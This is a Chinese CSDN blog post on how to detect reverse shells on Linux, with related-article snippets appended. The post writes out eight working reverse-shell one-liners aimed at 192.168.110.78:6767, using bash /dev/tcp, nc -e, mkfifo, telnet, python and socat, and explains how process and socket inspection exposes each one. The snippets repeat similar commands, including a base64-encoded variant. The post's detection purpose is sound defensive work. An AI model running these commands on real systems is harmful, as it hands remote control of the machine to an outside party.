linux检测反弹shell

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量2.2k 收藏 6
点赞数
文章标签: shell 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43781139/article/details/114063088
版权

 

1、bash -i >& /dev/tcp/192.168.110.78/6767 0>&1

可以看到bash -i的输入输出和错误输出全部定位到了一个socket上

我们lsof看一下bash进程

我们可以看到bash远程指向一个ip,那我们完全可以判定这是一个反弹shell。

 

2、nc -e /usr/bin/bash 192.168.110.78 6767

这里我们看到bash的输入输出都定位到了管道上,而这个管道指向父进程nc,而且这两个进程都连接了一个socket

这两个socket都是指向其他机器,所以我们也可以断定为一个反弹shell

 

3、mknod backpipe p && telnet 192.168.110.78 666 0<backpipe | /usr/bin/bash 1>backpipe

我们可以看到,bash的输入是管道,输出是个文件,而talent的输入是个文件,输出是管道,形成了一个闭环,并且有socket行为,所以我们可以断定它为反弹shell。

mknod backpipe p; nc 192.168.110.78 6767 0<backpipe | /usr/bin/bash 1>backpipe 2>backpipe 是类似的

 

4、rm /tmp/f;mkfifo /tmp/f; cat /tmp/f|/bin/sh -I 2>&1|nc 192.168.110.78 6767 >/tmp/f

这里我们发现bash下有三个子进程,但是仔细看,这三也是成环的,而且nc中有socket连接,所以也判定为反弹shell

 

5、/usr/bin/tcsh -i >& /dev/tcp/192.168.110.78/6767 0>&1

这里很多socket连接,bash下就很不正常,罪名成立

 

6、bash -c 'sh -I &>/dev/tcp/192.168.110.78/6767 0>&1'

bash子进程看起来啥也没干,但子进程的子进程在搞事情,杀之!

 

7、python -c 'import pty;pty.spawn("bash")' >/dev/tcp/192.168.110.78/6767 <&1 2>&1

我们可以看到bash虽然没有什么可疑操作,但是他的父进程python存在外连,那也不能惯着,杀!

 

8、socat TCP4:192.168.110.78:6767 EXEC:bash,pty,stderr,setsid,sigint,sane

我们发现bash和socat都有很多奇怪的外联,杀掉

 

特殊、msf上线

因为查杀msf会大大提高误报率,所以msf这里不要查

 

 

 

 

 

 

 

 

孤客浪子
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux下的shell反弹
ITgougou_的博客
10-27 267
linux下的shell反弹设计重定向,文件描述符等内容 01 linux的文件描述符 可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。 当Linux启动的时候默认打开三个文件描述符,分别是: 标准输入standard input 0 (默认设备键盘) 标准输出standard output 1(默认设备显示器) 错误输出:error output 2(默认设备显示器) 下面引用先知社区对文件描述符的脑涂:.
Linux反弹shell
weixin_64338385的博客
11-26 2273
0x01. bash 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口 在目标主机上执行: bash -i >& /dev/tcp/攻击主机i...
使用代码验证linux子进程与父进程的关系
09-04
Linux下父进程可以使用fork 函数创建子进程,但是当父进程先退出后,子进程不会也退出呢?通过下面这个小实验,我们能够很好的看出来
linux反弹shell总结
redwand的博客
02-22 1407
本文总结了Linux下常用的反弹shell方式,同时说明了交互式shell的得到方法,最后积累了反弹shell语法高亮与tab自动补齐。
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
2401_84466336的博客
04-23 2958
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 8973
文章目录 前言 为何给靶机发送这条执行命令就自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
Linux系统反弹shell总结
Bird&Bird
06-07 1300
目录前言正向连接反向连接利用netcat反弹shell利用Bash反弹shellCurl配合Bash反弹shell反弹shell的命令写入定时任务将反弹shell的命令写入/etc/profile文件利用Socat反弹shell利用Telnet反弹shell方法一方法二各种脚本反弹shellPython 脚本反弹shellphp 脚本反弹shellPerl 脚本反弹shellRuby脚本反弹shell使用Metasploit生成反弹shell用的一句话反弹shell后获取模拟终端使用OpenSSL反弹加密
命令执行漏洞
qq_42307546的博客
01-20 1476
命令执行漏洞也称为rce,当应用调用一些外部程序就用到一些系统命令的函数,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,就造成命令执行漏洞 相关函数 system(args)有回显 passthru(args)有c exec(args)回显最后一行-必须echo输出 shell_exec()无回显必须输出 代码分析 <?php /** * Created by runner.han * There is nothing new under the sun */
Linux和Windows反弹shell以及变种
SHELLCODE_8BIT的博客
04-07 2349
Linux bash -i >& /dev/tcp/127.0.0.1/2333 0>&1 bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}' Windows
Linux 反弹shell(二)反弹shell的本质
djph26741的博客
06-14 193
Linux 反弹shell(二)反弹shell的本质 from:https://xz.aliyun.com/t/2549 0X00 前言 在上一篇文章Linux反弹shell(一)文件描述符与重定向,我们已经讨论过了反弹shell中最核心也是相对较难理解的部分,那么接下来我们就可以正式借反弹shell的实例分析回顾前一篇文章讲的知识,并且也加深对反弹shel...
linux-ReverseShellasaService反弹shell即服务
08-13
3. **权限与隐藏**:为了防止被检测到,反弹shell服务可能采用多种技巧,比如使用非标准端口、隐藏进程、加密通信等。 4. **脚本语言**:Python、Perl、Bash等脚本语言常被用于创建反弹shell,因为它们灵活且易于...
hershell - Go语言反弹Shell后门.zip
07-18
3. **可配置性**:反弹Shell通常允许攻击者自定义连接参数,如端口号、加密方式、通信协议等,以适应不同的网络环境和避免检测。 4. **隐藏性**:Go语言编写的程序可以很容易地进行混淆和编码,增加分析难度,降低被...
Linux内网渗透.doc
07-08
* 反弹 shell 提权 提权辅助工具: * GTFOBins:https://gtfobins..io/ GTFOBins 是一个精心策划的 Unix 二进制文件列表,可以用来绕过错误配置系统中的本地安全限制。 * BeRoot:...
Linux入侵常用命令之防黑客示例代码
09-15
黑客可能上传C语言源代码文件并编译成可执行程序,以反弹shell到自己的服务器。例如,使用`gcc -o 2 2.c`,`chmod +x 2`,然后执行`./2`。 6. **下载与编译库**: 对于某些工具(如arpsniffer),可能需要先下载...
AWD比赛各类必备脚本
07-09
6. **反弹Shell**:通过控制受害主机向攻击者的服务器建立连接,实现远程控制。这需要理解TCP/IP协议栈,熟悉如何构造反向连接payload。 7. **后台flag读取**:在AWD比赛中,"flag"通常代表关键信息,需要在不被...
linux服务器告警反弹shell行为
lanren312的博客
05-20 447
检测说明:进程sh的启动参数为 /bin/sh -c bash -i>& /dev/tcp/服务器iP/端口 0>&1,符合可疑进程参数的特性.发现有记录 * * * * * bash -i >& /dev/tcp/服务器iP/端口 0>&1。客户今天持续收到服务器告警,给出了可以参数信息。告警说明:Linux反弹shell行为。再去看cron日志,果然一分钟一次。果断将里面的内容清空,到此告警消失。
入侵检测——如何实现反弹shell检测
qq_42009262的博客
03-24 2547
如何实现反弹shell检测
反弹shell原理与检测思路
weixin_45690589的博客
02-26 584
反弹shell的本质可以定义为:一个client上的bash进程 可以和 server上的进程通信。本质上就是检测 shell进程(如bash)的输入输出是否来自于一个远程的server。由于进程通信的复杂性(例如pipe),导致单纯的检测shell进程的0 1 2 是否来自socket存在漏报。但是按照这个思路,检测shell进程的0 1 2 的来源,顺着来源继续跟踪,如果最终是来自一个socket。那么则存在反弹shell的风险。
linux反弹shell检测和溯源,Wazuh联动osquery检测linux反弹shell
weixin_39820136的博客
05-14 1128
用osquery根据制定的规则定时检测系统并生成包含查询结果的日志文件,wazuh再对这些日志文件进行解析之后匹配规则告警。osquery下载安装的过程就略过了。这里简单介绍下osquery,详细请参考官方文档文件结构/etc/osquery//usr/share/osquery/osquery.example.conf/usr/share/osquery/lenses/{*}.aug/usr/s...
linux web服务器应急响应靶场
01-25
Linux web服务器应急响应靶场是一个模拟真实环境下的紧急事件响应练习场所。该靶场旨在提供一个具有高度仿真度的网络环境,以帮助安全人员提升对Linux web服务器应急响应能力。 首先,靶场模拟真实的攻击场景,包括常见的漏洞利用和攻击技术,如SQL注入、跨站脚本攻击、远程命令执行等等。通过对这些攻击进行实践,安全人员能够学习并理解攻击者的手段和思路,从而更好地应对和防范类似攻击。 其次,靶场提供了一系列实际的应急响应演练,可以让安全人员在真实环境中应对各种紧急事件。比如,在被攻击后的服务器恢复和修复、日志分析和溯源等方面进行演练。通过这些实践,安全人员能够锻炼应急响应的技能,提升对应急事件的处理能力。 此外,靶场还提供了一些工具和资源,用于监控和检测攻击行为,以及收集和分析攻击相关的数据。通过这些工具的使用,安全人员可以更好地掌握攻击者的行为特征,及时发现异常情况并采取相应措施。同时,还能够积累更多的经验,为今后的实际工作提供更好的应对手段和方法。 总之,Linux web服务器应急响应靶场是一个非常有益的训练和实践场所,可以帮助安全人员提升Linux web服务器应急响应的能力和技巧。通过参与靶场的训练,可以提高应对紧急事件的速度和准确性,从而更好地保护服务器和网站的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值